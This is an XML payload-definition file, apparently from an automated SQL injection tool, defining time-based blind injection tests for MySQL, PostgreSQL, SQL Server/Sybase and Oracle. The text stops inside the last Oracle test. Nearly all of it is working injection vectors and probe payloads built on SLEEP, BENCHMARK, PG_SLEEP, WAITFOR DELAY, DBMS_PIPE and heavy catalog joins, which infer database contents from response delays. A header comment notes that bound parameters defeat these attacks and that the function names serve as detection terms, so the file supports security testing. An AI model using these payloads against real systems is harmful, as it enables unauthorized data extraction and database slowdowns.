Path: blob/master/data/xml/payloads/time_blind.xml
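<?xml version="1.0" encoding="UTF-8"?>

<root>
    <!--
        Time-based blind SQL injection test definitions, grouped by DBMS.

        Layout of each <test> in this part of the file:
          title     name of the test
          stype     5 for every test here
          level     integer, 1 to 5 here
          risk      integer, 1 to 3 here; every OR variant carries risk 3
          clause    comma-separated clause identifiers; 0 on the WAITFOR tests
          where     1 for every test here
          vector    expression whose delay depends on [INFERENCE]
          request   payload is the same expression without the [INFERENCE] condition
                    (presumably the initial probe; confirm against the consuming code),
                    optionally followed by a trailing SQL comment token
          response  time is [SLEEPTIME] where a sleep/wait function is called and
                    [DELAYED] where the delay comes from an expensive expression
                    (BENCHMARK, GENERATE_SERIES, RANDOMBLOB, multi-way joins over
                    catalog tables)
          details   target DBMS and, where given, a version constraint

        Tokens in square brackets are placeholders, presumably filled in by the
        consuming tool.

        Defensive reading: every entry depends on request text reaching the SQL
        parser as code, which bound parameters prevent. The function and table
        names used below (SLEEP, BENCHMARK, PG_SLEEP, WAITFOR DELAY,
        DBMS_PIPE.RECEIVE_MESSAGE, self-joins of catalog tables) are useful match
        terms for request inspection and for database audit or slow-query logs.
    -->

    <!-- Time-based boolean tests -->

    <!-- MySQL -->

    <!-- Preferring "query SLEEP" over "SLEEP" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->
    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>OR SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>OR SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP - comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP - comment)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>2</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
        <request>
            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
        <request>
            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&lt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt; 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>
        <stype>5</stype>
        <level>2</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
        <request>
            <payload>RLIKE SLEEP([SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
        <request>
            <payload>RLIKE SLEEP([SLEEPTIME])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
        <request>
            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <!-- NOTE(review): of the four ELT tests, only this first one declares a dbms_version; the three that follow omit it. Confirm which form is intended. -->
    <test>
        <title>MySQL AND time-based blind (ELT)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
        <request>
            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
            <dbms_version>&gt;= 5.0.12</dbms_version>
        </details>
    </test>

    <test>
        <title>MySQL OR time-based blind (ELT)</title>
        <stype>5</stype>
        <level>3</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
        <request>
            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>

    <test>
        <title>MySQL AND time-based blind (ELT - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
        <request>
            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>

    <test>
        <title>MySQL OR time-based blind (ELT - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
        <request>
            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>MySQL</dbms>
        </details>
    </test>

    <!-- PostgreSQL -->

    <test>
        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
            <dbms_version>&gt; 8.1</dbms_version>
        </details>
    </test>

    <test>
        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
            <dbms_version>&gt; 8.1</dbms_version>
        </details>
    </test>

    <test>
        <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
            <dbms_version>&gt; 8.1</dbms_version>
        </details>
    </test>

    <test>
        <title>PostgreSQL &gt; 8.1 OR time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
            <dbms_version>&gt; 8.1</dbms_version>
        </details>
    </test>

    <test>
        <title>PostgreSQL AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <test>
        <title>PostgreSQL OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <test>
        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <test>
        <title>PostgreSQL OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>PostgreSQL</dbms>
        </details>
    </test>

    <!-- Microsoft SQL Server / Sybase -->

    <test>
        <title>Microsoft SQL Server/Sybase time-based blind (IF)</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>0</clause>
        <where>1</where>
        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
        <request>
            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>0</clause>
        <where>1</where>
        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
        <request>
            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>2</risk>
        <clause>1,2,3,8,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
        <stype>5</stype>
        <level>2</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>2</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <test>
        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>
        <stype>5</stype>
        <level>5</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
        </details>
    </test>

    <!-- Oracle -->

    <test>
        <title>Oracle AND time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind</title>
        <stype>5</stype>
        <level>1</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle AND time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>1</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
        </response>
        <details>
            <dbms>Oracle</dbms>
        </details>
    </test>

    <test>
        <title>Oracle OR time-based blind (comment)</title>
        <stype>5</stype>
        <level>4</level>
        <risk>3</risk>
        <clause>1,2,3,9</clause>
        <where>1</where>
        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
        <request>
            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
            <comment>--</comment>
        </request>
        <response>
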